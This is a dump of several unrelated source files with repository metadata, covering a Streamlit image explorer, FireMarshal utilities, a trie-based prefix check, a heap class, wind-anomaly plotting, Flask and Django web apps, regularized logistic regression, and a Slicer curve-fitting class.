# Once we have the dependencies, add a selector for the app mode on the sidebar.
st.sidebar.title("Image Explorer")
front_text = st.markdown(get_file_content_as_string("front.md"))
_files = get_file_list("data/")
for file in _files:
split = split_of(file)
files[split].append(file)
app_mode = st.sidebar.selectbox(
"Choose the app mode", ["Show instructions", "Launch", "Show the source code"]
)
if app_mode == "Show instructions":
st.sidebar.success('To Launch Explorer, Select "Launch".')
elif app_mode == "Show the source code":
front_text.empty()
st.code(get_file_content_as_string("stream.py"))
elif app_mode == "Launch":
front_text.empty()
image_explorer()
if __name__ == "__main__":
main()
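# To try this locally (an assumption about the environment): place the
# SessionState helper module next to this file and run
#   streamlit run stream.py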
|
[
"sweetcocoa@snu.ac.kr"
] |
sweetcocoa@snu.ac.kr
|
2befe1a095c5cca705e4984daeef32dbf5cc58e9
|
cb4e5259ae2e67bc36feb059819e78d9b2f6644b
|
/wlutil/__init__.py
|
5d1c5b946a2a6465b23c0abc8b2bf27aa23f80e2
|
[
"LicenseRef-scancode-bsd-3-clause-jtag"
] |
permissive
|
abejgonzalez/FireMarshal
|
bf7645684c0c418840c29e95a0da2f7fae0d4aeb
|
56c050e8be3d3c9cfe5be6b777a5a82de47a14d4
|
refs/heads/master
| 2020-08-31T08:44:10.693786
| 2019-10-22T01:08:55
| 2019-10-22T01:08:55
| 218,650,718
| 0
| 0
|
NOASSERTION
| 2019-10-31T00:19:01
| 2019-10-31T00:19:01
| null |
UTF-8
|
Python
| false
| false
| 258
|
py
|
"""
Utilities for dealing with FireSim workloads
"""
from .wlutil import *
from .build import buildWorkload
from .launch import launchWorkload
from .test import testWorkload, testResult
from .install import installWorkload
from .config import ConfigManager
|
[
"nathanp@berkeley.edu"
] |
nathanp@berkeley.edu
|
c1d8b8802fa2dbe27d011b791fec7a5a85e50004
|
a3f80da27fee10ad2fc924020deb3aa8b19fdb96
|
/src/boj/boj5052/Main.py
|
399a0a2558a589e3a51edd163e278352f0711b44
|
[] |
no_license
|
jeemyeong/problem-solving
|
dad4bfe6fa0cc08678b5caebb7dcb751ef8c72d8
|
add26360ebe9758bc2f050545c93edfaf8cd342a
|
refs/heads/master
| 2021-05-16T17:54:37.804842
| 2018-07-15T11:25:53
| 2018-07-15T11:25:53
| 103,120,018
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,183
|
py
|
import sys
def I(): return int(sys.stdin.readline())
def S(): return input()
class Trie(object):
def __init__(self, initial = False):
if initial:
self.trie = {"initial": True}
else:
self.trie = {"initial": False}
def insert(self, node):
if len(node) == 0:
return
if node[0] in self.trie:
self.trie[node[0]].insert(node[1:])
else:
self.trie[node[0]] = Trie()
self.trie[node[0]].insert(node[1:])
def count(self):
return len(self.trie)-1
def isInitial(self):
return self.trie["initial"]
def isEmpty(self):
if self.count() == 0:
return True
else:
return False
def check(self, node):
if len(node) == 0 or (self.isEmpty() and not self.isInitial()):
return True
if node[0] in self.trie:
return self.trie[node[0]].check(node[1:])
else:
return False
def solve2(lst): #51588 KB 7644 MS
trie = Trie(initial = True)
for item in lst:
if trie.check(item):
return "NO"
trie.insert(item)
return "YES"
def insertToTrie(trie, node):
if len(node) == 0:
return
if node[0] in trie:
insertToTrie(trie[node[0]], node[1:])
else:
trie[node[0]] = {}
insertToTrie(trie[node[0]], node[1:])
def checkInTrie(trie, node):
if len(node) == 0 or len(trie) == 0:
return True
if node[0] in trie:
return checkInTrie(trie[node[0]], node[1:])
else:
return False
def solve3(lst): #41924 KB 6420 MS
trie = {"INITIAL": "TRUE"}
for item in lst:
if checkInTrie(trie, item):
return "NO"
insertToTrie(trie, item)
return "YES"
def solve(lst): #29128 KB 5392 MS
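    # After sorting, a number that is a prefix of another is immediately
    # followed by one of its extensions, so checking adjacent pairs suffices.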
lst.sort()
for i in range(len(lst)-1):
if len(lst[i]) < len(lst[i+1]) and lst[i] == lst[i+1][:len(lst[i])]:
return "NO"
return "YES"
def main():
t = I()
for _ in range(t):
n = I()
lst = []
for _ in range(n):
lst.append(S())
print(solve(lst))
main()
|
[
"jeemyeong@gmail.com"
] |
jeemyeong@gmail.com
|
0b6395abe2b53c4ce9df5eaab42b972dbf838e3a
|
8c67a786d726e4e02d494ba35b882bd8e88042c8
|
/heap/heap.py
|
313d96e37d43fc4ddae312437914809721a01d9e
|
[] |
no_license
|
Bloomca/algorithms
|
34143667ea902a4d2e0e81a79660cdc80c7c3c11
|
a36fc0334b02793c914959664dbc11c4e71a72a3
|
refs/heads/master
| 2021-01-19T02:49:19.510850
| 2016-07-26T19:14:56
| 2016-07-26T19:14:56
| 63,779,615
| 4
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,446
|
py
|
class Heap:
"""
Heap data structure with two operations:
Insert in O(n * log(n))
Extract-min (Extract-max) in O(n * log(n))
Both types of heaps are supported, both min and max extraction
Data is stored in array, with binary layers
"""
def __init__(self, type = 'min'):
self.data = []
self.type = type
"""
Parent index is always twice closer to the beginning of the array
"""
def get_parent(self, i):
return (i + 1) / 2 - 1
def check_heap_property(self, parent_elem, child_elem):
if self.type == 'min':
return parent_elem <= child_elem
else:
return parent_elem >= child_elem
"""
Insert strategy is that we add the child to the end of the array
And then we check whether we violated or not heap structure
Because layers are structured as binary tree, we have maximum
log(n) layers, and in the worst case we have to replace
elements log(n) times
"""
def insert(self, element):
self.data.append(element)
child_index = len(self.data) - 1
while child_index > 0:
parent_index = self.get_parent(child_index)
child_elem = self.data[child_index]
parent_elem = self.data[parent_index]
heap_property = self.check_heap_property(parent_elem, child_elem)
if heap_property == False:
self.data[parent_index] = element
self.data[child_index] = parent_elem
child_index = parent_index
else:
break
return self.data
def extract(self):
elem = self.data[0]
self.data[0] = self.data[-1]
self.data = self.data[:-1]
index = 0
min_index = 0
min_child = 0
while True:
parent_elem = self.data[index]
children_index = index * 2
child_left_index = children_index + 1
child_right_index = children_index + 2
try:
child_left = self.data[child_left_index]
except:
child_left = None
try:
child_right = self.data[child_right_index]
except:
child_right = None
if child_left is None and child_right is None:
        break
elif child_left is None:
min_child = child_right
min_index = child_right_index
elif child_right is None:
min_child = child_left
min_index = child_left_index
elif (self.type == 'min' and child_left <= child_right) or (self.type == 'max' and child_left >= child_right):
min_child = child_left
min_index = child_left_index
elif (self.type == 'min' and child_left > child_right) or (self.type == 'max' and child_left < child_right):
min_child = child_right
min_index = child_right_index
heap_property = self.check_heap_property(parent_elem, min_child)
if heap_property == False:
self.data[index] = min_child
self.data[min_index] = parent_elem
index = min_index
else:
break
return (elem, self.data)
def get_data(self):
return self.data
def get_length(self):
return len(self.data)
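# A minimal usage sketch (an illustration, not part of the original module):
if __name__ == '__main__':
    heap = Heap('min')
    for value in [5, 3, 8, 1]:
        heap.insert(value)
    smallest, remaining = heap.extract()
    print(smallest)          # 1
    print(heap.get_data())   # the remaining heap, e.g. [3, 5, 8]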
|
[
"seva.zaikov@gmail.com"
] |
seva.zaikov@gmail.com
|
87fc10a9db642a91f08b99c9b1c87dfbdc15c7ba
|
70c4f21aabb1bdf26789b38883cbde737250d38c
|
/digital_voting_app/web_app/migrations/0003_remove_voter_occupation.py
|
147ab5d098a749c141df1d86c62935bb714d2cdb
|
[] |
no_license
|
DigitalVotingApp-Dev/DigitalVotingApp
|
55f2853a2467582f524a761f2c48bcb24d5ee213
|
da80e167ee6697a93ee1e668b6ccfe7807148b22
|
refs/heads/master
| 2022-12-13T13:00:40.289476
| 2019-06-18T11:04:19
| 2019-06-18T11:04:19
| 161,016,237
| 1
| 1
| null | 2022-12-08T00:53:50
| 2018-12-09T07:37:58
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 332
|
py
|
# Generated by Django 2.0.13 on 2019-03-27 06:27
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('web_app', '0002_auto_20190326_1628'),
]
operations = [
migrations.RemoveField(
model_name='voter',
name='occupation',
),
]
|
[
"baljeetsingh1274@gmail.com"
] |
baljeetsingh1274@gmail.com
|
a887704eba56ea217186faef1581f771a575cae2
|
c4a32dc9fb26d72721864982b52578e2aea31db4
|
/1.PRIMERA EXPOSICIÓN/Perfil vertical eventos/CONFIRMACIÓN EVN TT.py
|
d4fbf3970dd6c725de7ddbc27eb8f6eb44bf4d1d
|
[] |
no_license
|
yordanarango/CODE_TRABAJO_GRADO
|
30eee8778bf4d61706fd5e7dc26b609ad1214fd3
|
5eb55e90b864359942e40ac8d4672c28dea1e1de
|
refs/heads/master
| 2021-04-15T12:18:33.032433
| 2018-03-22T14:19:35
| 2018-03-22T14:19:35
| 126,347,319
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,496
|
py
|
from mpl_toolkits.basemap import Basemap
import matplotlib.pyplot as plt
import matplotlib.pylab as pl
import netCDF4 as nc
import numpy as np
####################
"LECTURA DE DATOS"
####################
Archivo = nc.Dataset('/home/yordan/Escritorio/TRABAJO_DE_GRADO/DATOS_Y_CODIGOS/DATOS/PERFIL_DE_EVENTOS_DE_VIENTOS/EVENTO_TEHUANTEPEC.nc')
v_e = Archivo.variables['v'][:, :, 24:, 60:181]
u_e = Archivo.variables['u'][:, :, 24:, 60:181]
level = Archivo.variables["level"][:]
V = nc.Dataset('/home/yordan/Escritorio/TRABAJO_DE_GRADO/DATOS_Y_CODIGOS/DATOS/VIENTO V a 10 m (promedio mensual).nc')
U = nc.Dataset('/home/yordan/Escritorio/TRABAJO_DE_GRADO/DATOS_Y_CODIGOS/DATOS/VIENTO U a 10 m (promedio mensual).nc')
v = V.variables["v10"][:, 24:, 60:181]
u = U.variables["u10"][:, 24:, 60:181]
Lat = V.variables["latitude"][24:]  # The latitude array is cropped right away to 0-24 N
Lon = V.variables["longitude"][60:181]  # The longitude array is cropped right away to 255 E-285 E
#######################################
"ORGANIZACION DE LAS VARIABLES\
YA QUE VAN DEBEN IR EN CORDENADAS ESTE"
#######################################
Lon = Lon-360
########################
"CICLO ANUAL DE VIENTOS"
########################
cic_an_u = np.zeros((12,97,121))
cic_an_v = np.zeros((12,97,121))
for i in range(12):
for j in range(97):
for k in range(121):
cic_an_u[i,j,k] = np.mean(u[i::12,j,k])
cic_an_v[i,j,k] = np.mean(v[i::12,j,k])
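# Note: the loops above are equivalent to a single vectorized call, e.g.
# cic_an_u = u.reshape(-1, 12, 97, 121).mean(axis=0), provided the record
# spans an exact number of years (an assumption about the input file).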
############################
"MEDIA NOV Y DIC DE VIENTOS"
############################
med_ND_u = np.zeros((97, 121))
med_ND_v = np.zeros((97, 121))
for j in range(97):
for k in range(121):
med_ND_u[j,k] = np.mean(cic_an_u[10:12,j,k])
med_ND_v[j,k] = np.mean(cic_an_v[10:12,j,k])
################################################
"ANOMALÍA DE VIENTOS DEL EVENTO A NIVEL DEL MAR"
################################################
an_u_evn = np.zeros((6,97,121))
an_v_evn = np.zeros((6,97,121))
for i in range(6):
for j in range(97):
for k in range(121):
an_u_evn[i,j,k] = u_e[i,36,j,k]-med_ND_u[j,k]
an_v_evn[i,j,k] = v_e[i,36,j,k]-med_ND_v[j,k]
##########################################
"MEDIA DE ANOMALÍAS DE VIENTOS DEL EVENTO"
##########################################
med_an_u_evn = np.zeros((97,121))
med_an_v_evn = np.zeros((97,121))
for i in range(97):
for j in range(121):
med_an_u_evn[i,j] = np.mean(an_u_evn[:,i,j])
med_an_v_evn[i,j] = np.mean(an_v_evn[:,i,j])
################################
"VELOCIDAD DE VIENTOS 1979-2016"
################################
spd = np.sqrt(u*u+v*v)
#####################################
"CICLO ANUAL DE VELOCIDAD DE VIENTOS"
#####################################
cic_an_spd = np.zeros(((12, 97, 121)))
for i in range(12):
for j in range(97):
for k in range(121):
cic_an_spd[i,j,k] = np.mean(spd[i::12,j,k])
#########################################
"MEDIA NOV Y DIC DE VELOCIDAD DE VIENTOS"
#########################################
med_ND_spd = np.zeros((97, 121))
for j in range(97):
for k in range(121):
med_ND_spd[j,k] = np.mean(cic_an_spd[10:12,j,k])
#############################################################
"ANOMALÍA DE VELOCIDAD DE VIENTOS DEL EVENTO A NIVEL DEL MAR"
#############################################################
spd_evn = np.sqrt(u_e[:6,36,:,:]*u_e[:6,36,:,:]+v_e[:6,36,:,:]*v_e[:6,36,:,:])  # Event wind speed at sea level
an_spd_evn = np.zeros((6,97,121))
for i in range(6):
for j in range(97):
for k in range(121):
an_spd_evn[i,j,k] = spd_evn[i,j,k]-med_ND_spd[j,k]
##########################################################
"PROMEDIO DE ANOMALÍAS DE VELOCIDAD DE VIENTOS DEL EVENTO"
##########################################################
me_an_spd_evn = np.zeros((97,121))
for i in range(97):
for j in range(121):
me_an_spd_evn[i,j] = np.mean(an_spd_evn[:,i,j])
###################
"MAPA DE ANOMALÍAS"
###################
box_TT_lon = [-97, -97, -93.3, -93.3, -97]
box_TT_lat = [15.9, 11.7, 11.7, 15.9, 15.9]
lons,lats = np.meshgrid(Lon,Lat)
fig = plt.figure(figsize=(8,8), edgecolor='W',facecolor='W')
ax = fig.add_axes([0.1,0.1,0.8,0.8])
map = Basemap(projection='merc', llcrnrlat=0, urcrnrlat=24, llcrnrlon=-105, urcrnrlon=-75, resolution='i')
map.drawcoastlines(linewidth = 0.8)
map.drawcountries(linewidth = 0.8)
map.drawparallels(np.arange(0, 30, 8),labels=[1,0,0,1])
map.drawmeridians(np.arange(-120,-60,15),labels=[1,0,0,1])
x, y = map(lons,lats)
x1, y1 = map(-94.5, 19.25)
x2, y2 = map(-94.75, 17.25)
x3, y3 = map(-94.75, 15)
TT_lon,TT_lat = map(box_TT_lon, box_TT_lat)
CF = map.contourf(x,y, me_an_spd_evn[:,:], np.linspace(0, 14, 20), extend='both', cmap=plt.cm.RdYlBu_r )#plt.cm.rainbow, plt.cm.RdYlBu_r
cb = map.colorbar(CF, size="5%", pad="2%", extendrect = 'True', drawedges = 'True', format='%.1f')
cb.set_label('m/s')
Q = map.quiver(x[::2,::2], y[::2,::2], med_an_u_evn[::2,::2], med_an_v_evn[::2,::2], scale=300)
plt.quiverkey(Q, 0.95, 0.05, 10, '10 m/s' )
ax.set_title('$Anomalia$ $media$ $del$ $evento-Tehuantepec-(Nov/2002)$', size='15')
map.plot(TT_lon, TT_lat, marker=None, color='k')
map.plot(x1, y1, marker='D', color='m')
map.plot(x2, y2, marker='D', color='m')
map.plot(x3, y3, marker='D', color='m')
map.fillcontinents(color='white')
plt.show()
|
[
"yuarangoj@unal.edu.co"
] |
yuarangoj@unal.edu.co
|
b5772ab6d016c1eada09bc35eb878b6ac386dbe6
|
da91b375b9450be733370ca715e704f912e4efd0
|
/flaskapp/__init__.py
|
49df7b0183f418a855dc1d364e166e3942e2626e
|
[] |
no_license
|
Ge-eez/IProject-Backend
|
b64a51ce83ed536f9a53314b6fada2e8ed9dcee9
|
cafbac7161fab564ba90707760b485b07498a1d5
|
refs/heads/master
| 2023-05-22T16:17:00.562210
| 2021-06-17T04:46:27
| 2021-06-17T04:46:27
| 369,288,841
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,487
|
py
|
import os
from flask import Flask
from flask_cors import CORS
from flask_session import Session
from flask_sqlalchemy import SQLAlchemy
from flask_bcrypt import Bcrypt
from flask_login import LoginManager
from flask_restful import Api
from flask_migrate import Migrate
from flask_rest_paginate import Pagination
from safrs import SAFRSBase, SAFRSAPI
app = Flask(__name__)
app.config["SESSION_PERMANENT"] = True
app.config["SESSION_TYPE"] = "filesystem"
app.config['SECRET_KEY'] = 'f604efb78b05fc462348c8f5f4cf82c7'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True
app.config['SESSION_COOKIE_SAMESITE'] = 'Lax'
app.config["DEBUG"] = True
db = SQLAlchemy()
dbUrl = os.getenv("DATABASE_URL")
# Heroku-style URLs use the "postgres://" scheme, which SQLAlchemy no longer
# accepts; rewrite it to "postgresql://".
if dbUrl[8] == ":":
    dbUrl = dbUrl[0:8] + "ql" + dbUrl[8:]
app.config['SQLALCHEMY_DATABASE_URI'] = dbUrl
db.init_app(app)
CORS(app, support_credentials=True)
bcrypt = Bcrypt(app)
Session(app)
login_manager = LoginManager(app)
api = Api(app)
migrate = Migrate(app, db)
pagination = Pagination(app, db)
app.app_context().push()
from flaskapp.models import *
def create_api(app, HOST="localhost", PORT=5000, API_PREFIX=""):
api = SAFRSAPI(app, host=HOST, port=PORT, prefix=API_PREFIX)
api.expose_object(Account)
api.expose_object(Admin)
api.expose_object(Institution)
api.expose_object(Company)
api.expose_object(Student)
api.expose_object(Teacher)
api.expose_object(Project)
api.expose_object(Work)
api.expose_object(Rating)
api.expose_object(Payment)
print("Created API: http://{}:{}/{}".format(HOST, PORT, API_PREFIX))
from flaskapp import routes, auth, project, user, institution, work, rating, payment
app.register_blueprint(auth.bp)
api.add_resource(institution.InstitutionAPI, '/institutions/', '/institutions/<int:id>')
api.add_resource(project.ProjectAPI, '/projects/', '/projects/<int:id>')
api.add_resource(user.UserAPI, '/users/', '/users/<int:id>')
api.add_resource(user.UserVerificationAPI, '/users/verify/<int:id>')
api.add_resource(user.StudentAPI, '/students/', '/students/<int:id>')
api.add_resource(user.TeacherAPI, '/teachers/', '/teachers/<int:id>')
api.add_resource(user.CompanyAPI, '/companies/', '/companies/<int:id>')
api.add_resource(work.WorkAPI, '/works/', '/works/<int:id>')
api.add_resource(work.FinishWorkAPI, '/work/end/<int:id>')
api.add_resource(rating.RateAPI, '/rates/', '/rates/<int:id>')
api.add_resource(payment.PaymentAPI, '/payments/', '/payments/<int:id>')
# create_api(app)
|
[
"elshadaikassutegegn@gmail.com"
] |
elshadaikassutegegn@gmail.com
|
097dfea7934d6c0ecbe261df559a5c5f50018e6f
|
6daabad92d7071879fd8822963f2c709dba3c450
|
/hw2-2.py
|
30efcc4a0f884c75c395622f783d94c37abdbbd4
|
[] |
no_license
|
y1k333/ML-ng
|
ac03601b62493902ae959e2f65dc0d17bf65c01d
|
2b99ece503f580926886f6e1a82c22a49f0706ad
|
refs/heads/master
| 2021-05-09T09:50:26.517315
| 2018-09-28T20:04:25
| 2018-09-28T20:04:25
| 119,460,429
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,387
|
py
|
# Logistic Regression with regularization
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
# visualize data
datafile = 'data/ex2data2.txt'
cols = np.loadtxt(datafile,delimiter=',',usecols=(0,1,2),unpack=True) # Read in comma separated data
# Form the usual "X" matrix and "y" vector
X = np.transpose(np.array(cols[:-1]))
y = np.transpose(np.array(cols[-1:]))
m = y.size # number of training examples
# Insert the usual column of 1's into the "X" matrix
X = np.insert(X,0,1,axis=1)
# Divide the sample into two: ones with positive classification, one with null classification
pos = np.array([X[i] for i in xrange(X.shape[0]) if y[i] == 1])
neg = np.array([X[i] for i in xrange(X.shape[0]) if y[i] == 0])
# Check to make sure I included all entries
# print "Included everything? ",(len(pos)+len(neg) == X.shape[0])
def plot_data():
plt.plot(pos[:,1],pos[:,2],'k+',label='y=1')
plt.plot(neg[:,1],neg[:,2],'yo',label='y=0')
plt.xlabel('Microchip Test 1')
plt.ylabel('Microchip Test 2')
plt.legend()
plt.grid(True)
# Draw it square to emphasize circular features
plt.figure(figsize=(6,6))
plot_data()
# feature mapping
def mapFeature(x1col, x2col):
    """
    Takes a column of n x1 values and a column of n x2 values, and builds
    an n x 28 matrix of polynomial features as described in the homework
    assignment
    """
degrees = 6
out = np.ones((x1col.shape[0], 1))
for i in range(1, degrees+1):
for j in range(0, i+1):
term1 = x1col ** (i-j)
term2 = x2col ** (j)
term = (term1 * term2).reshape( term1.shape[0], 1 )
out = np.hstack(( out, term ))
return out
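# For example, mapFeature(np.array([2.]), np.array([3.])) returns a (1, 28)
# row laid out as [1, x1, x2, x1**2, x1*x2, x2**2, ..., x2**6].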
# Create feature-mapped X matrix
mappedX = mapFeature(X[:,1],X[:,2])
from scipy.special import expit #Vectorized sigmoid function
# Hypothesis function and cost function for logistic regression
def h(mytheta, myX): # Logistic hypothesis function
return expit(np.dot(myX,mytheta))
# cost function; the regularization parameter lambda defaults to 0
def compute_cost(mytheta, myX, myy, mylambda = 0.):
"""
mytheta is an n- dimensional vector of initial theta guess
X is matrix with m- rows and n- columns
y is a matrix with m- rows and 1 column
Note this includes regularization, if you set mylambda to nonzero
For the first part of the homework, the default 0. is used for mylambda
"""
term1 = np.dot(np.array(myy).T, np.log(h(mytheta, myX)))
term2 = np.dot((1 - np.array(myy)).T, np.log(1 - h(mytheta, myX)))
regterm = (mylambda / 2) * np.sum(np.dot(mytheta[1:].T, mytheta[1:])) # Skip theta0
return float(-(1./m) * (term1 + term2 + regterm))
# cost function and gradient
# The cost function is the same one implemented above, since it already
# includes regularization (toggled off by the default lambda = 0).
# No separate implementation of the gradient is needed, because the scipy
# optimization routine used below only requires the cost function itself.
# Let's check that the cost function returns a cost of 0.693 with zeros for initial theta,
# and regularized x values
initial_theta = np.zeros((mappedX.shape[1],1))
print(compute_cost(initial_theta, mappedX, y))  # should print about 0.693
# Learning parameters using fminunc
# I noticed that fmin wasn't converging (passing max # of iterations)
# so let's use minimize instead
from scipy import optimize
def optimizeRegularizedTheta(mytheta, myX, myy, mylambda=0.):
result = optimize.minimize(compute_cost, mytheta, args=(myX, myy, mylambda), method='BFGS',
options={"maxiter": 500, "disp": False})
return np.array([result.x]), result.fun
theta, mincost = optimizeRegularizedTheta(initial_theta, mappedX, y)
def plotBoundary(mytheta, myX, myy, mylambda=0.):
"""
Function to plot the decision boundary for arbitrary theta, X, y, lambda value
Inside of this function is feature mapping, and the minimization routine.
It works by making a grid of x1 ("xvals") and x2 ("yvals") points,
And for each, computing whether the hypothesis classifies that point as
True or False. Then, a contour is drawn with a built-in pyplot function.
"""
theta, mincost = optimizeRegularizedTheta(mytheta,myX,myy,mylambda)
xvals = np.linspace(-1,1.5,50)
yvals = np.linspace(-1,1.5,50)
zvals = np.zeros((len(xvals),len(yvals)))
for i in xrange(len(xvals)):
for j in xrange(len(yvals)):
myfeaturesij = mapFeature(np.array([xvals[i]]),np.array([yvals[j]]))
zvals[i][j] = np.dot(theta,myfeaturesij.T)
zvals = zvals.transpose()
u, v = np.meshgrid( xvals, yvals )
mycontour = plt.contour( xvals, yvals, zvals, [0])
#Kind of a hacky way to display a text on top of the decision boundary
myfmt = { 0:'Lambda = %d'%mylambda}
plt.clabel(mycontour, inline=1, fontsize=15, fmt=myfmt)
plt.title("Decision Boundary")
# Build a figure showing contours for various values of regularization parameter, lambda
# It shows for lambda=0 we are overfitting, and for lambda=100 we are underfitting
plt.figure(figsize=(12, 10))
plt.subplot(221)
plot_data()
plotBoundary(theta, mappedX, y, 0.)
plt.subplot(222)
plot_data()
plotBoundary(theta, mappedX, y, 1.)
plt.subplot(223)
plot_data()
plotBoundary(theta, mappedX, y, 10.)
plt.subplot(224)
plot_data()
plotBoundary(theta, mappedX, y, 100.)
plt.show()
|
[
"kaiyang@usc.edu"
] |
kaiyang@usc.edu
|
2f145ed3885c6a99d1b0264ddffbc2837b3817a4
|
f49d35798bdc789767f93913439ae71e5e76de0d
|
/final/post/views.py
|
5754f642fafdc3d911d1e3c7a3128841438cdeb1
|
[] |
no_license
|
RealWei/Social-Computing-Application-Design
|
49aafd37e6917e0606efefa1c1c68d52c6cba51c
|
68674ea18af69e94ed920d422b7ad73fdbe2eac0
|
refs/heads/master
| 2016-09-13T20:45:18.913838
| 2016-05-25T02:21:23
| 2016-05-25T02:21:23
| 59,623,894
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,081
|
py
|
# -*- coding: utf-8 -*-
import json
from random import sample
from django.shortcuts import render
from django import forms
from django.core import serializers
from django.http import HttpResponse
from django.http import HttpResponseRedirect
from django.http import JsonResponse
from django.views.decorators.csrf import csrf_exempt
from post.models import Story, StoryForm, Vote
from post.recommendations import ProductRecommendationProvider
from register.models import User
recommender = ProductRecommendationProvider()
@csrf_exempt
def create(request):
# return HttpResponseRedirect('http://www.facebook.com')
if request.method == 'POST':
form = StoryForm(request.POST, request.FILES)
if form.is_valid():
userID = form.cleaned_data['userID']
user = User.objects.get(id=userID)
user.coins += 5
user.save()
new_story = form.save()
story = Story.objects.get(pk = new_story.pk)
story.userName = user.name
story.save()
response_data = serializers.serialize('json', [story,])
return HttpResponse(response_data, content_type='application/json')
else:
print(form.errors)
form = StoryForm()
return render(request, 'temp.html', {'form': form})
def getStory(request):
friends = request.GET.getlist('friends[]')
stories = Story.objects.filter(userID__in = friends).order_by('id').reverse()
response_data = serializers.serialize('json', stories)
struct = json.loads(response_data)
response_data = json.dumps(struct, ensure_ascii=False)
response = HttpResponse(response_data, content_type='application/json')
response['Access-Control-Allow-Origin'] = '*'
response['Access-Control-Allow-Methods'] = 'POST, GET'
response['Access-Control-Max-Age'] = '1000'
response['Access-Control-Allow-Headers'] = '*'
response['charset'] = 'utf-8'
return response
@csrf_exempt
def vote(request):
if request.method == 'POST':
storyID = request.POST.get('storyID', '2')
userFBID = request.POST.get('userFBID', '1')
score = float(request.POST.get('score', '1'))
vote = Vote.objects.filter(story_id = storyID, user_id = userFBID)
story = Story.objects.get(pk = storyID)
        if vote.exists():
            vote = vote[0]
            if vote.score != score:
                # The user flipped an existing vote: move one count between
                # the like and dislike buckets
                if score > 0:
                    story.likes += 1
                    story.dislikes -= 1
                else:
                    story.likes -= 1
                    story.dislikes += 1
            vote.score = score
            vote.save()
else:
if score > 0:
story.likes += 1
else:
story.dislikes += 1
vote = Vote.objects.create(story_id = storyID, user_id = userFBID, score = score)
story.save()
return HttpResponse(status = 201)
    response = HttpResponse(status = 200)
response['Access-Control-Allow-Origin'] = '*'
response['Access-Control-Allow-Methods'] = 'POST, GET, DELETE'
response['Access-Control-Max-Age'] = '1000'
response['Access-Control-Allow-Headers'] = '*'
return response
@csrf_exempt
def deleteVote(request):
storyID = request.POST['storyID']
userFBID = request.POST['userFBID']
score = float(request.POST['score'])
Vote.objects.filter(story_id = storyID, user_id = userFBID).delete()
story = Story.objects.get(pk = storyID)
if score > 0:
story.likes -= 1
else:
story.dislikes -= 1
story.save()
return HttpResponse(status = 202)
def getVotes(request):
storyID = request.GET['storyID']
userFBID = request.GET['userFBID']
response_data = serializers.serialize('json', Vote.objects.filter(story_id = storyID, user_id = userFBID))
struct = json.loads(response_data)
response_data = json.dumps(struct, ensure_ascii = False)
response = HttpResponse(response_data, content_type='application/json')
response['Access-Control-Allow-Origin'] = '*'
response['Access-Control-Allow-Methods'] = 'POST, GET'
response['Access-Control-Max-Age'] = '1000'
response['Access-Control-Allow-Headers'] = '*'
response['charset'] = 'utf-8'
return response
def getUser(request):
userID = request.GET['userFBID']
response_data = serializers.serialize('json', [User.objects.get(id = userID),])
struct = json.loads(response_data)
response_data = json.dumps(struct, ensure_ascii = False)
response = HttpResponse(response_data, content_type='application/json')
response['Access-Control-Allow-Origin'] = '*'
response['Access-Control-Allow-Methods'] = 'POST, GET'
response['Access-Control-Max-Age'] = '1000'
response['Access-Control-Allow-Headers'] = '*'
response['charset'] = 'utf-8'
return response
def recommend(request):
userID = request.GET.get('userFBID', '0')
user = User.objects.get(id = userID)
if(user.coins <= 0):
return HttpResponse(status = 204)
user.coins -= 1
user.save()
# recommender.precompute()
recommendations = []
query = list(recommender.storage.get_recommendations_for_user(user = User.objects.get(id = userID)))
for recommendation in query:
recommendations.append(recommendation.object)
if(len(recommendations) < 5):
count = Story.objects.all().count()
rand_ids = sample(range(1, count), 5 - len(recommendations))
stories = list(Story.objects.filter(id__in=rand_ids))
for story in stories:
recommendations.append(story)
serialized_string = serializers.serialize('json', recommendations)
json_string = json.loads(serialized_string)
response_data = json.dumps(json_string, ensure_ascii=False)
response = HttpResponse(response_data, content_type='application/json')
response['Access-Control-Allow-Origin'] = '*'
response['Access-Control-Allow-Methods'] = 'POST, GET'
response['Access-Control-Max-Age'] = '1000'
response['Access-Control-Allow-Headers'] = '*'
response['charset'] = 'utf-8'
return response
|
[
"tsengchengwei@gmail.com"
] |
tsengchengwei@gmail.com
|
79d55234b6cc4dd1255378d64c29ca50ce4f32b4
|
2af943fbfff74744b29e4a899a6e62e19dc63256
|
/4DModules/FourDAnalysis/Python/CurveFittingGammaVariate.py
|
145cbfbd7f2281c8b7ae3578411964ded0cf0d56
|
[] |
no_license
|
lheckemann/namic-sandbox
|
c308ec3ebb80021020f98cf06ee4c3e62f125ad9
|
0c7307061f58c9d915ae678b7a453876466d8bf8
|
refs/heads/master
| 2021-08-24T12:40:01.331229
| 2014-02-07T21:59:29
| 2014-02-07T21:59:29
| 113,701,721
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,093
|
py
|
# ----------------------------------------------------------------------
#
# Python Package for Curve Fitting in 3D Slicer 4D Analysis Module
#
# Portions (c) Copyright 2009 Brigham and Women's Hospital (BWH)
# All Rights Reserved.
#
# See Doc/copyright/copyright.txt
# or http://www.slicer.org/copyright/copyright.txt for details.
#
# Author: Junichi Tokuda (tokuda@bwh.harvard.edu)
#
# For more detail, please refer:
# http://wiki.na-mic.org/Wiki/index.php/Slicer3:FourDAnalysis
# ----------------------------------------------------------------------
# ----------------------------------------------------------------------
# NOTE:
# This python script requires SciPy package, which doesn't come with
# Slicer3 package in default. Build 3D Slicer with USE_SCIPY option
# (can be configured in slicer_variables.tcl) before run this script
# from 3D Slicer.
# ----------------------------------------------------------------------
from FourDAnalysis import CurveAnalysisBase
import scipy, numpy
from scipy.integrate import quad
import sys
# ----------------------------------------------------------------------
# Gamma Variate Function fitting class
# ----------------------------------------------------------------------
class CurveFittingGammaVariate(CurveAnalysisBase):
# ------------------------------
# Constructor -- Set initial parameters
def __init__(self):
self.ParameterNameList = ['Sp', 'alpha', 'beta', 'Ta', 'S0']
self.InitialParameter = [200.0, 3.0, 1.0, 0.0, 20.0]
